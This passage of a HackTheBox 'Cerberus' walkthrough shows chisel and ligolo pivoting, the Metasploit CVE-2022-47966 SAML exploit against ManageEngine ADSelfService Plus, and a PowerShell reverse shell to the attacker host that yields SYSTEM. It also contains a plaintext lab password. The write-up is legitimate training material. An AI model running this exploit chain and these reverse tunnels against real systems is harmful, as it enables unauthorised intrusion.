[Agent : www-data@icinga] » INFO[0044] Agent joined.                                 id=86bb7c5e-1850-45fe-9fb3-4f1e82a11f7f name="CERBERUS\\\\matthew@DC" remote="10.10.11.205:49524"
[Agent : www-data@icinga] » 
[Agent : www-data@icinga] » session 
? Specify a session : 2 - CERBERUS\\matthew@DC - 10.10.11.205:49524 - 86bb7c5e-1850-45fe-9fb3-4f1e82a11f7f
[Agent : CERBERUS\\matthew@DC] » interface_create --name ligolo1
INFO[0158] Creating a new "ligolo1" interface...        
INFO[0158] Interface created!                           
[Agent : CERBERUS\\matthew@DC] » ifconfig 
┌───────────────────────────────────────────────┐
│ Interface 0                                   │
├──────────────┬────────────────────────────────┤
│ Name         │ vEthernet (Switch1)            │
│ Hardware MAC │ 00:15:5d:5f:e8:00              │
│ MTU          │ 1500                           │
│ Flags        │ up|broadcast|multicast|running │
│ IPv6 Address │ fe80::e225:edaa:5112:dfc3/64   │
│ IPv4 Address │ 172.16.22.1/28                 │
└──────────────┴────────────────────────────────┘
┌─────────────────────────────────────────────────┐
│ Interface 1                                     │
├──────────────┬──────────────────────────────────┤
│ Name         │ Ethernet0 3                      │
│ Hardware MAC │ 00:50:56:b0:70:81                │
│ MTU          │ 1500                             │
│ Flags        │ up|broadcast|multicast|running   │
│ IPv6 Address │ dead:beef::18/128                │
│ IPv6 Address │ dead:beef::d5b6:1a82:ed83:740/64 │
│ IPv6 Address │ fe80::9aa1:6bb4:769a:899d/64     │
│ IPv4 Address │ 10.10.11.205/24                  │
└──────────────┴──────────────────────────────────┘
┌──────────────────────────────────────────────┐
│ Interface 2                                  │
├──────────────┬───────────────────────────────┤
│ Name         │ Loopback Pseudo-Interface 1   │
│ Hardware MAC │                               │
│ MTU          │ -1                            │
│ Flags        │ up|loopback|multicast|running │
│ IPv6 Address │ ::1/128                       │
│ IPv4 Address │ 127.0.0.1/8                   │
└──────────────┴───────────────────────────────┘
[Agent : CERBERUS\\matthew@DC] » interface_add_route --name ligolo1 --route 172.16.22.0/28
error: file exists
[Agent : CERBERUS\\matthew@DC] » interface_add_route --name ligolo1 --route 172.16.22.1/32
INFO[0509] Route created.                               
[Agent : CERBERUS\\matthew@DC] » start --tun ligolo1
[Agent : CERBERUS\\matthew@DC] » INFO[0565] Starting tunnel to CERBERUS\\matthew@DC (86bb7c5e-1850-45fe-9fb3-4f1e82a11f7f) 

cve_2022_47966

we can see internal port 9251

*Evil-WinRM* PS C:\\Users\\matthew\\Documents> netstat -ano -p TCP | findstr LISTENING
<--SNIP-->
  TCP    0.0.0.0:9251           0.0.0.0:0              LISTENING       5548
<--SNIP-->

but my nmap result says it’s filtered but nc says otherwise

┌──(anurag㉿anurag)-[~/htb/Cerberus]
└─$ nmap -sT -p 9251 172.16.22.1
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-08-14 23:12 IST
Nmap scan report for dc.cerberus.local (172.16.22.1)
Host is up (0.00029s latency).

PORT     STATE    SERVICE
9251/tcp filtered unknown

Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Cerberus]
└─$ nc -v 172.16.22.1 9251
dc.cerberus.local [172.16.22.1] 9251 (?) open
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Cerberus]
└─$ nmap -sT -Pn -p 9251 --reason -v 172.16.22.1
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-08-14 23:16 IST
Initiating Connect Scan at 23:16
Scanning dc.cerberus.local (172.16.22.1) [1 port]
Discovered open port 9251/tcp on 172.16.22.1
Completed Connect Scan at 23:16, 0.89s elapsed (1 total ports)
Nmap scan report for dc.cerberus.local (172.16.22.1)
Host is up, received user-set (0.89s latency).

PORT     STATE SERVICE REASON
9251/tcp open  unknown syn-ack

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.92 seconds                                                     

└─$ nmap -sC -sV -Pn -p 9251 --reason -v 172.16.22.1
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-08-14 23:18 IST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 23:18
Completed NSE at 23:18, 0.00s elapsed
Initiating NSE at 23:18
Completed NSE at 23:18, 0.00s elapsed
Initiating NSE at 23:18
Completed NSE at 23:18, 0.00s elapsed
Initiating SYN Stealth Scan at 23:18
Scanning dc.cerberus.local (172.16.22.1) [1 port]
Discovered open port 9251/tcp on 172.16.22.1
Completed SYN Stealth Scan at 23:18, 0.33s elapsed (1 total ports)
Initiating Service scan at 23:18
Scanning 1 service on dc.cerberus.local (172.16.22.1)
Completed Service scan at 23:19, 42.44s elapsed (1 service on 1 host)
NSE: Script scanning 172.16.22.1.
Initiating NSE at 23:19
Completed NSE at 23:19, 19.93s elapsed
Initiating NSE at 23:19
Completed NSE at 23:19, 4.50s elapsed
Initiating NSE at 23:19
Completed NSE at 23:19, 0.00s elapsed
Nmap scan report for dc.cerberus.local (172.16.22.1)
Host is up, received user-set (0.32s latency).

PORT     STATE SERVICE  REASON         VERSION
9251/tcp open  ssl/http syn-ack ttl 64 Apache Tomcat (language: en)
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
| ssl-cert: Subject: commonName=cerberus.local/organizationName=CE/stateOrProvinceName=Dorset/countryName=UK
| Subject Alternative Name: DNS:cerberus.local
| Issuer: commonName=ManageEngine ADSelfService Plus/organizationName=ManageEngine Zoho Corporation/stateOrProvinceName=CA/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-01-29T19:26:48
| Not valid after:  2043-01-23T19:26:48
| MD5:   520f:7c21:072a:787b:d574:0d10:94ae:11ff
|_SHA-1: 56a4:c917:2b7a:0fad:79b7:390a:affb:bfcf:8a6a:dade
|_http-title: Site doesn't have a title (text/html;charset=UTF-8).
|_ssl-date: 2025-08-13T17:49:32+00:00; -1d00h00m05s from scanner time.
| http-methods: 
|_  Supported Methods: GET POST

Host script results:
|_clock-skew: -1d00h00m05s

NSE: Script Post-scanning.
Initiating NSE at 23:19
Completed NSE at 23:19, 0.00s elapsed
Initiating NSE at 23:19
Completed NSE at 23:19, 0.00s elapsed
Initiating NSE at 23:19
Completed NSE at 23:19, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 68.42 seconds
           Raw packets sent: 1 (44B) | Rcvd: 12 (2.396KB)

We can see adself sign in page

we can see there is unauthenticated RCE for Build prior to 6003

└─$ searchsploit adself                        
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                                                                              |  Path
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
ManageEngine ADSelfService Build prior to 6003 - Remote Code Execution (Unauthenticated)                                                                                                                                                    | java/webapps/48739.txt
ManageEngine ADSelfService Plus 4.4 - 'EmployeeSearch.cc' Multiple Cross-Site Scripting Vulnerabilities                                                                                                                                     | php/webapps/35331.txt
ManageEngine ADSelfService Plus 4.4 - POST Manipulation Security Question                                                                                                                                                                   | php/webapps/35330.txt
ManageEngine ADSelfService Plus 6.1 - CSV Injection                                                                                                                                                                                         | multiple/webapps/49885.py
ManageEngine ADSelfService Plus 6.1 - User Enumeration                                                                                                                                                                                      | windows/remote/50873.py
ManageEngine ADSelfService Plus Build 6118 - NTLMv2 Hash Exposure                                                                                                                                                                           | windows/remote/50904.py
ZOHO ManageEngine ADSelfService Plus 4.5 Build 4521 - Cross-Site Scripting                                                                                                                                                                  | php/webapps/36316.txt
Zoho ManageEngine ADSelfService Plus 5.7 < 5702 build - Cross-Site Scripting                                                                                                                                                                | php/webapps/46815.txt
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
                                                                                                                                                                                                                                                                             

and in our case, build is 6210

┌──(anurag㉿anurag)-[~/htb/Cerberus]
└─$ curl -X POST -s -k <https://172.16.22.1:9251/servlet/GetProductVersion> | jq .
{
  "DB_TYPE": "postgres",
  "BUILD_NUMBER": "6210",
  "BUILD_ARCHITECTURE": "64",
  "RUNNING_AS_SERVICE": true,
  "HA_SUPPORTED": "true",
  "PRODUCT_SEQ_NO": "ADSSP-4-DSFJGWB8-1094274869000",
  "PRODUCT_NAME": "ManageEngine ADSelfService Plus",
  "IS_BUNDLED_DB": "true",
  "INSTALLED_AS_SERVICE": true,
  "PRODUCT_VERSION": "6.2",
  "SERVICE_ACCOUNT_PRIVILEGED": false
}

we found the exploit exploit/multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966

We need a GUID, and for that

there are two ways

1. The URL above does have useful information. The two parameters passed are SAMLRequest and RelayState. Both appear to be URL encoded base64.

   If I URL decode the SAMLRequest (online tools like urldecoder.org or Burp Decoder will work), and then pass them to a SAML decoder such as this one on samltool.com, it generates XML:

   <?xml version="1.0" encoding="UTF-8"?>
   <saml2p:AuthnRequest AssertionConsumerServiceURL="<https://DC:9251/samlLogin/67a8d101690402dc6a6744b8fc8a7ca1acf88b2f>" Destination="<https://dc.cerberus.local/adfs/ls/>" ID="_68c55db128eef523034f50338a7aa6db" IssueInstant="2025-08-13T17:48:23.120Z" ProtocolBinding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST" ProviderName="ManageEngine ADSelfService Plus" Version="2.0" xmlns:saml2p="urn:oasis:names:tc:SAML:2.0:protocol"><saml2:Issuer Format="urn:oasis:names:tc:SAML:2.0:nameid-format:entity" xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion"><https://DC:9251/samlLogin/67a8d101690402dc6a6744b8fc8a7ca1acf88b2f></saml2:Issuer><saml2p:NameIDPolicy AllowCreate="true" Format="urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified"/><saml2p:RequestedAuthnContext Comparison="exact"><saml2:AuthnContextClassRef xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion">urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml2:AuthnContextClassRef></saml2p:RequestedAuthnContext></saml2p:AuthnRequest>

2. login as Matthew, and it will redirect you to https://dc:9251/samlLogin/67a8d101690402dc6a6744b8fc8a7ca1acf88b2f

Now We need to get the ISSUER_URL from the offline backup

┌──(anurag㉿anurag)-[~/htb/Cerberus/loot/offlinebackup]
└─$ grep ISSUER *
ADSIAMIDPAuthConfigParams.txt:1 ISSUER_URL      <http://dc.cerberus.local/adfs/services/trust>

and we get the shell on msf

msf6 exploit(multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966) > show options 

Module options (exploit/multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966):

   Name         Current Setting                               Required  Description
   ----         ---------------                               --------  -----------
   GUID         67a8d101690402dc6a6744b8fc8a7ca1acf88b2f      yes       The SAML endpoint GUID
   ISSUER_URL   <http://dc.cerberus.local/adfs/services/trust>  yes       The Issuer URL used by the Identity Provider which has been configured as the SAML authentication provider for the target server
   Proxies                                                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RELAY_STATE                                                no        The Relay State. Default is "http(s)://<rhost>:<rport>/samlLogin/LoginAuth"
   RHOSTS       172.16.22.1                                   yes       The target host(s), see <https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html>
   RPORT        9251                                          yes       The target port (TCP)
   SSL          true                                          no        Negotiate SSL/TLS for outgoing connections
   SSLCert                                                    no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI    /samlLogin                                    yes       The SAML endpoint URL
   URIPATH                                                    no        The URI to use for this exploit (default is random)
   VHOST                                                      no        HTTP server virtual host

   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.

Payload options (cmd/windows/powershell_reverse_tcp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   LHOST         tun0             yes       The listen address (an interface may be specified)
   LOAD_MODULES                   no        A list of powershell modules separated by a comma to download over the web
   LPORT         4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   1   Windows Command

View the full module info with the info, or info -d command.

msf6 exploit(multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966) > run

[*] Started reverse TCP handler on 10.10.16.7:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Powershell session session 1 opened (10.10.16.7:4444 -> 10.10.11.205:50564) at 2025-08-15 12:43:42 +0530

PS C:\\Program Files (x86)\\ManageEngine\\ADSelfService Plus\\bin> whoami
nt authority\\system
PS C:\\Program Files (x86)\\ManageEngine\\ADSelfService Plus\\bin> 

Redo pivot with Chisel

I’ll redo the pivot with chisel

on ichinga linux

www-data@icinga:/tmp$ ./chisel client 10.10.16.7:8000 R:5985:172.16.22.1:5985
2025/08/15 05:44:56 client: Connecting to ws://10.10.16.7:8000
2025/08/15 05:44:59 client: Connected (Latency 252.6704ms)

on kali

└─$ ./chisel server -p 8000 --reverse
2025/08/15 11:13:49 server: Reverse tunnelling enabled
2025/08/15 11:13:49 server: Fingerprint IpM4rdlC50EVB042JO5iJdUl2nUrESOojpYZt9fMLL8=
2025/08/15 11:13:49 server: Listening on <http://0.0.0.0:8000>
2025/08/15 11:14:54 server: session#1: tun: proxy#R:5985=>172.16.22.1:5985: Listening

we get windoows shell

└─$ evil-winrm -i 127.0.0.1 -u matthew -p 147258369  
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: <https://github.com/Hackplayers/evil-winrm#Remote-path-completion>
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\\Users\\matthew\\Documents>

for double pivoit I will upload the chisel to windows and

*Evil-WinRM* PS C:\\temp> ./chisel_win.exe client 10.10.16.7:8000 R:socks
chisel_win.exe : 2025/08/14 23:02:05 client: Connecting to ws://10.10.16.7:8000
    + CategoryInfo          : NotSpecified: (2025/08/14 23:0...10.10.16.7:8000:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
2025/08/14 23:02:08 client: Connected (Latency 251.2766ms)

on kali

2025/08/15 11:32:03 server: session#2: Client version (1.10.1) differs from server version (0.0.0-src)
2025/08/15 11:32:03 server: session#2: tun: proxy#R:127.0.0.1:1080=>socks: Listening

Now i can visit https://127.0.0.1:9251 with FoxyProxy to tunnel Firefox over 1080

Now let’s try again with msfconsole

msf6 exploit(multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966) > show options 

Module options (exploit/multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966):

   Name         Current Setting                               Required  Description
   ----         ---------------                               --------  -----------
   GUID         67a8d101690402dc6a6744b8fc8a7ca1acf88b2f      yes       The SAML endpoint GUID
   ISSUER_URL   <http://dc.cerberus.local/adfs/services/trust>  yes       The Issuer URL used by the Identity Provider which has been configured as the SAML authentication provider for the target server
   Proxies      socks5:127.0.0.1:1080                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RELAY_STATE                                                no        The Relay State. Default is "http(s)://<rhost>:<rport>/samlLogin/LoginAuth"
   RHOSTS       dc.cerberus.local                             yes       The target host(s), see <https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html>
   RPORT        9251                                          yes       The target port (TCP)
   SSL          true                                          no        Negotiate SSL/TLS for outgoing connections
   SSLCert                                                    no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI    /samlLogin                                    yes       The SAML endpoint URL
   URIPATH                                                    no        The URI to use for this exploit (default is random)
   VHOST                                                      no        HTTP server virtual host

   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  10.10.16.7       yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.

Payload options (cmd/windows/powershell_reverse_tcp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   LHOST         10.10.16.7       yes       The listen address (an interface may be specified)
   LOAD_MODULES                   no        A list of powershell modules separated by a comma to download over the web
   LPORT         4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   1   Windows Command

View the full module info with the info, or info -d command.

msf6 exploit(multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966) > run

[*] Started reverse TCP handler on 10.10.16.7:4444 
[!] AutoCheck is disabled, proceeding with exploitation
[*] Powershell session session 1 opened (10.10.16.7:4444 -> 10.10.11.205:58805) at 2025-08-15 12:18:31 +0530

PS C:\\Program Files (x86)\\ManageEngine\\ADSelfService Plus\\bin> whoami
nt authority\\system
PS C:\\Program Files (x86)\\ManageEngine\\ADSelfService Plus\\bin> 

I think the issue was with the payload

and we found root.txt

PS C:\\Program Files (x86)\\ManageEngine\\ADSelfService Plus\\bin> whoami
nt authority\\system
PS C:\\Program Files (x86)\\ManageEngine\\ADSelfService Plus\\bin> cd C:\\Users\\
PS C:\\Users> dir

    Directory: C:\\Users

Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        1/30/2023   2:44 AM                adfs_svc$                                                             
d-----        1/30/2023   4:14 AM                adfs_svc$.CERBERUS                                                    
d-----       11/29/2022   4:24 AM                Administrator                                                         
d-----        1/22/2023  11:22 AM                matthew                                                               
d-r---        4/10/2020  10:49 AM                Public                                                                

PS C:\\Users> cd Administrator
PS C:\\Users\\Administrator> cd Desktop
PS C:\\Users\\Administrator\\Desktop> dir

    Directory: C:\\Users\\Administrator\\Desktop

Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-ar---        8/14/2025  10:38 PM             34 root.txt